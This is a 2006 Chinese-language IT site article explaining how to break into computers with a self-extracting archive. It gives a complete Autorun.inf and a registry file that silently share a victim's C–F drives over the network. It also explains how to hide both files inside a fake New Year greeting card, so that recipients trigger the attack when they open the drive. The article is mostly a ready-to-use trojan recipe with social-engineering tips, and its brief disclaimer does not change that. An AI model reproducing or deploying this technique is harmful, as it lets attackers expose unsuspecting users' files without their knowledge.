IT运维管理,创造商业价值!
中国IT运维网首页 | 资讯中心 | 运维管理 | 信息安全 | CIO视界 | 云计算 | 最佳案例 | 运维资源 | 专题策划 | 知识库 | 论坛

用自解压包入侵

2006年03月28日
/

用自解压包删光别人的硬盘,相信大家都会。我给大家介绍个用自解压包入侵的方法。如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识破。如果不用木马,用些批处理炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。

把以下两行保存为Autorun.inf

[Autorun]
open=regedit /s Autorun.reg

把以下一段保存为Autorun.reg

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\c$]
"Path"="c:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]
"Path"="D:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E$]
"Path"="E:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F$]
"Path"="F:\\"
"Remark"=""
"Type"=dword:00000000
"Flags"=dword:00000192
"Parm1enc"=hex:
"Parm2enc"=hex:


现在是过年期间,电子贺卡漫天飞,将你的自解压包命名为“猴年贺卡”,包里
包个真贺卡,顺便把以上两个文件打包进去,注意要指定文件解包路径。当收贺卡人
点击自解压包时真贺卡被解压的同时,两个文件就悄悄的被解到指定位置。Autorun.inf
必须解到某一分区的根目录,名字不能变,可以设置文件隐藏属性。
Autorun.reg文件名和释放目录可以任意,可以更好的隐藏,注意Autorun.inf指向目录正确的地方。

当受害人双击有Autorun.inf的分区时,他的硬盘C、D、E、F分区就被打开公享。

黑客技术是把双刃剑,请不要用来危害他人,危害他人后果自负。
网络可以让世界颤抖,加入我们,实现你的梦想。上宾愿与各位朋友共同创造一片网上天地。


发表评论请到:http://bbs.cnitom.com

相关阅读

图文热点

Power架构产品创新 IBM推动其本土化发展
Power架构产品创新 IBM推动其本土化发展自从1990年,IBM推出基于RISC系统的新产品线RS/6000(现称eServer p系列)之后,...
WAF:高校Web应用安全守护者
WAF:高校Web应用安全守护者最近几年高校网站被攻击的事件时有发生,造成了不良影响,因此越来越多的高校开始...

本类热点